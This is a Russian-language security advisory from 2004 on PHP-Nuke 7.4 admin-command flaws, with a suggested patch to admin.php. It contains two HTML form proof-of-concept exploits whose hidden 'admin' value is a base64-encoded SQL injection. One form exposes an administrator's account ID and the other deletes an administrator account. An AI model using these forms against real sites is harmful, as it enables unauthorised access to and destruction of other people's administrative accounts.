Несколько уязвимостей в PHP-Nuke

Дата публикации:
06.09.2004
Всего просмотров:
1978
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: PHP-Nuke 7.4

Описание: Две уязвимости обнаружены в PHP-Nuke в обработке некоторых административных команд. Удаленный пользователь может просматривать информацию административной учетной записи и удалять административную учетную запись.

Удаленный пользователь может представить специально обработанный POST запрос, чтобы просматривать ‘’aid’ значение административной учетной записи. Пример:

 
<form name="form1" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="mod_authors">
<input type="submit" name="Submit" value="Display">
<br>
</p>
</form>
Также удаленный пользователь может представить специально обработанный POST запрос, чтобы удалить административную учетную запись. Пример:
 
 <form name="form1" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
USERNAME: <input type="text" name="del_aid">

<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="deladminconf">
<input type="submit" name="Submit" value="Delete Admin">
<br>
</p>
</form>

URL производителя: http://www.phpnuke.org/

Решение: Добавьте этот код в admin.php:

if ( !empty($HTTP_GET_VARS['op']) ) {
$op = $HTTP_GET_VARS['op'];
}

if ( !empty($HTTP_POST_VARS['op']) ) {
$op = $HTTP_POST_VARS['op'];
}


Ссылки: [XSS] PHP-Nuke 7.4 ViewAdmin Bug
или введите имя

CAPTCHA